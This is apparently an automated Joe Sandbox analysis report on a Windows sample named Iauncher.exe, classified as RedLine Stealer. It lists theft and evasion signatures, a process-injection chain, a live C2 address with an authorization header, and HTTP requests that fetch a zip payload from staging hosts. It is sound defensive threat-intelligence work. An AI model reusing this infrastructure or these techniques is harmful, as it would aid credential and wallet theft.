Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Iauncher.exe

Overview

General Information

Sample name:Iauncher.exe
Analysis ID:1434866
MD5:e69feb7fd40f408a088d879be323f37a
SHA1:0f71fa75df6795c43c69e7ec5689c995c135079e
SHA256:463dd34a95d86ca5d08059f1ec80d3b00d3bbabdc74936025b7e30ef2b3ee931
Tags:exe
Infos:

Detection

RedLine
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected RedLine Stealer
.NET source code contains potential unpacker
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Iauncher.exe (PID: 2448 cmdline: "C:\Users\user\Desktop\Iauncher.exe" MD5: E69FEB7FD40F408A088D879BE323F37A)
    • Iauncher.exe (PID: 7404 cmdline: "C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe" MD5: D79977A15EB010C637CF9078B4EB82C8)
      • conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegAsm.exe (PID: 7452 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": "147.45.47.65:47232", "Bot Id": "\ueb45", "Authorization Header": "a6a58668f69a7e8a13c2ff0e52c1d284"}
SourceRuleDescriptionAuthorStrings
Iauncher.exeJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    SourceRuleDescriptionAuthorStrings
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000000.1618643197.0000000000482000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000004.00000002.1978480941.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                Click to see the 5 entries
                SourceRuleDescriptionAuthorStrings
                0.0.Iauncher.exe.480000.0.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  2.2.Iauncher.exe.f40030.1.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    4.2.RegAsm.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      0.2.Iauncher.exe.5ae0000.10.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                        2.2.Iauncher.exe.f10000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                          Click to see the 2 entries
                          No Sigma rule has matched
                          Timestamp:05/01/24-20:35:54.029434
                          SID:2043234
                          Source Port:47232
                          Destination Port:49711
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:05/01/24-20:35:53.101816
                          SID:2046045
                          Source Port:49711
                          Destination Port:47232
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:05/01/24-20:36:00.399690
                          SID:2046056
                          Source Port:47232
                          Destination Port:49711
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:05/01/24-20:36:05.641411
                          SID:2043231
                          Source Port:49711
                          Destination Port:47232
                          Protocol:TCP
                          Classtype:A Network Trojan was detected

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": "147.45.47.65:47232", "Bot Id": "\ueb45", "Authorization Header": "a6a58668f69a7e8a13c2ff0e52c1d284"}
                          Source: Iauncher.exeReversingLabs: Detection: 23%
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeJoe Sandbox ML: detected
                          Source: Iauncher.exeJoe Sandbox ML: detected
                          Source: Iauncher.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 193.109.246.100:443 -> 192.168.2.4:49732 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.44.179:443 -> 192.168.2.4:49741 version: TLS 1.2
                          Source: Iauncher.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: C:\Users\Ilham-PC\Documents\Visual Studio 2015\Projects\Siticone.UI\Build\Release\Siticone.UI.WinForms\Siticone.UI.pdbBSJB source: Iauncher.exe, 00000000.00000002.3511337540.0000000003841000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed source: Iauncher.exe
                          Source: Binary string: costura.costura.pdb.compressedlB^q source: Iauncher.exe, 00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: costura.costura.pdb.compressed source: Iauncher.exe
                          Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: Iauncher.exe
                          Source: Binary string: C:\Users\Ilham-PC\Documents\Visual Studio 2015\Projects\Siticone.UI\Build\Release\Siticone.UI.WinForms\Siticone.UI.pdb source: Iauncher.exe, 00000000.00000002.3511337540.0000000003841000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 2_2_00F2960E FindFirstFileExW,2_2_00F2960E
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]0_2_05CB7908
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]0_2_05CB78F8
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]0_2_05CB7A41
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]0_2_07926ED0
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 07925E51h0_2_07925A10
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09F19332h0_2_09F191F0
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09F1F7CAh0_2_09F1F1B8
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then inc dword ptr [ebp-10h]0_2_09F1F1B8
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09F19B8Ah0_2_09F153C4
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09F16C89h0_2_09F1531C
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]0_2_09F1CDAC
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09F173C4h0_2_09F16EAF
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09F17957h0_2_09F16EAF
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09F19B8Ah0_2_09F19348
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09F173C4h0_2_09F16780

                          Networking

                          barindex
                          Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) 192.168.2.7:49711 -> 147.45.47.65:47232
                          Source: TrafficSnort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.7:49711 -> 147.45.47.65:47232
                          Source: TrafficSnort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 147.45.47.65:47232 -> 192.168.2.7:49711
                          Source: TrafficSnort IDS: 2046056 ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) 147.45.47.65:47232 -> 192.168.2.7:49711
                          Source: Malware configuration extractorURLs: 147.45.47.65:47232
                          Source: Yara matchFile source: 0.2.Iauncher.exe.5ae0000.10.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.Iauncher.exe.3d11a10.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: global trafficTCP traffic: 192.168.2.4:49742 -> 147.45.47.65:47232
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/z-Closing.txt HTTP/1.1Host: antiloxss.usite.proConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/hwid.txt HTTP/1.1Host: antiloxss.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/LM19AR/hwids.txt HTTP/1.1Host: antiloxss.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/LM19AR/Gitgo2/BuildLink.txt HTTP/1.1Host: antiloxss.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/LM19AR/Gitgo2/BuildName.txt HTTP/1.1Host: antiloxss.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/LM19AR/Gitgo2/BuildZipName.txt HTTP/1.1Host: antiloxss.usite.pro
                          Source: global trafficHTTP traffic detected: GET /Iauncher.zip HTTP/1.1Host: gitgo.orgConnection: Keep-Alive
                          Source: Joe Sandbox ViewASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
                          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/z-Closing.txt HTTP/1.1Host: antiloxss.usite.proConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/hwid.txt HTTP/1.1Host: antiloxss.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/LM19AR/hwids.txt HTTP/1.1Host: antiloxss.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/LM19AR/Gitgo2/BuildLink.txt HTTP/1.1Host: antiloxss.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/LM19AR/Gitgo2/BuildName.txt HTTP/1.1Host: antiloxss.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/LM19AR/Gitgo2/BuildZipName.txt HTTP/1.1Host: antiloxss.usite.pro
                          Source: global trafficHTTP traffic detected: GET /Iauncher.zip HTTP/1.1Host: gitgo.orgConnection: Keep-Alive
                          Source: Iauncher.exe, 00000000.00000002.3508288083.0000000000BE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: CLIENT_VERSIONthttp://gdata.youtube.com/feeds/api/videos/{0}?v=2&alt=jsonDFailed to get youtube video data: Lhttp://vimeo.com/api/v2/video/{0}.json@Failed to get vimeo video data: ork Manager.<br><br> <b>LICENSE MODULE</b><br> The license module enables you to work without interruptions. Issues with the module can be caused by:<br><br> (i) <i>Framework Manager is not installed</i><br>(ii) <i>HDD formatting</i><br>(iii) <i>OS reintallation</i>,<br>(iv) <i>Siticone Files Deletion</i>, or<br>(v) <i>Any other issues</i>.<br><br> For assistance, please contact our support centre at: <i>support@siticoneframework.com</i>PMissing Manager or the Module is corrupt4Download Framework Manager4Contact Our Support CentreHmailto:support@siticoneframework.comDhttps://www.siticoneframework.com/ equals www.youtube.com (Youtube)
                          Source: global trafficDNS traffic detected: DNS query: antiloxss.usite.pro
                          Source: global trafficDNS traffic detected: DNS query: google.com
                          Source: global trafficDNS traffic detected: DNS query: gitgo.org
                          Source: Iauncher.exe, 00000000.00000002.3509420380.00000000029D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://antiloxss.usite.pro
                          Source: Iauncher.exe, 00000000.00000002.3509420380.00000000029D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://antiloxss.usite.prod
                          Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003841000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                          Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003841000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                          Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003841000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                          Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003841000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                          Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003841000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                          Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003841000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                          Source: Iauncher.exe, 00000000.00000002.3509420380.00000000028EA000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3508288083.0000000000BE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gdata.youtube.com/feeds/api/videos/
                          Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gitgo.org
                          Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gitgo.orgd
                          Source: RegAsm.exe, 00000004.00000002.1979253603.0000000000BDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adp/1.0/g
                          Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003841000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                          Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003841000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                          Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
